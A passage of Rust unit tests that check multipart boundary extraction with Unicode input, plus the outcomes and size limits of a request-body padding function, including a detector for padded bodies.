835        // "boundary" is 8 bytes; the fallback case-insensitive check does `p.get(..9)`.
836        // We construct a value where the slice would fall mid-codepoint.
837        let ct = "multipart/form-data; \u{2261}boundary=abc"; // ≡ before "boundary"
838        let boundary = extract_boundary(ct);
839        // This particular input won't match any prefix, but must not panic.
840        let _ = boundary; // either Some or None — we only care it doesn't panic.
841
842        // Also test a real multibyte in the boundary= value position.
843        let ct2 = "multipart/form-data; boundary=\u{2261}abc"; // ≡ in boundary value
844        let boundary2 = extract_boundary(ct2);
845        // The value "\u{2261}abc" should be returned if the prefix matches.
846        assert!(
847            boundary2.is_some(),
848            "unicode in boundary value must be preserved"
849        );
850    }
851
852    #[test]
853    fn extract_boundary_with_unicode_before_byte_9_does_not_panic() {
854        // A multi-byte char (3 bytes) placed at byte 6 of the param name
855        // would cause `p.get(..9)` to return None safely (non-char boundary).
856        // "bound\u{2261}y=" — "bound" = 5 bytes, ≡ = 3 bytes (bytes 5-7), "y=" starts at 8.
857        let ct = "multipart/form-data; bound\u{2261}y=myfence";
858        let _ = extract_boundary(ct); // must not panic
859    }
860
861    // ── pad_multipart: body not starting with boundary → SkippedOpaque ───
862
863    #[test]
864    fn pad_multipart_body_not_starting_with_boundary_is_skipped() {
865        // A multipart body that doesn't start with --<boundary> is malformed.
866        // pad_multipart must return SkippedOpaque rather than corrupting it.
867        let boundary = "abc123";
868        let malformed_body = b"this body does not start with the boundary";
869        let ct = format!("multipart/form-data; boundary={boundary}");
870        let out = pad(malformed_body, &ct, 16 * 1024);
871        assert_eq!(
872            out,
873            PadOutcome::SkippedOpaque,
874            "malformed multipart (body missing leading boundary) must be SkippedOpaque"
875        );
876    }
877
878    // ── looks_padded for multipart ────────────────────────────────────────
879
880    #[test]
881    fn looks_padded_detects_multipart_shape() {
882        let boundary = "fence42";
883        let body = format!("--{boundary}\r\n\r\n--{boundary}--\r\n");
884        let ct = format!("multipart/form-data; boundary={boundary}");
885        let out = pad(body.as_bytes(), &ct, 8 * 1024);
886        if let PadOutcome::Padded { bytes, .. } = out {
887            assert!(
888                looks_padded(&bytes),
889                "looks_padded must detect multipart padding"
890            );
891        }
892    }
893
894    // ── MIN_USEFUL_PAD / MAX_USEFUL_PAD constant anti-rig ─────────────────
895
896    #[test]
897    fn min_useful_pad_is_4_kib() {
898        assert_eq!(MIN_USEFUL_PAD, 4 * 1024, "MIN_USEFUL_PAD must be 4 KiB");
899    }
900
901    #[test]
902    fn max_useful_pad_is_8_mib() {
903        assert_eq!(
904            MAX_USEFUL_PAD,
905            8 * 1024 * 1024,
906            "MAX_USEFUL_PAD must be 8 MiB"
907        );
908    }
909
910    #[test]
911    fn pad_at_exactly_min_useful_pad_produces_padded() {
912        // requested_bytes == MIN_USEFUL_PAD should NOT be SkippedTooSmall
913        // (the guard is `< MIN_USEFUL_PAD`, not `<=`).
914        let out = pad(b"", "application/json", MIN_USEFUL_PAD);
915        assert!(
916            matches!(out, PadOutcome::Padded { .. }),
917            "exactly MIN_USEFUL_PAD must produce Padded, not SkippedTooSmall"
918        );
919    }
920
921    #[test]
922    fn pad_one_below_min_useful_pad_is_too_small() {
923        let out = pad(b"", "application/json", MIN_USEFUL_PAD - 1);
924        assert_eq!(
925            out,
926            PadOutcome::SkippedTooSmall,
927            "one byte below MIN_USEFUL_PAD must be SkippedTooSmall"
928        );
929    }
930}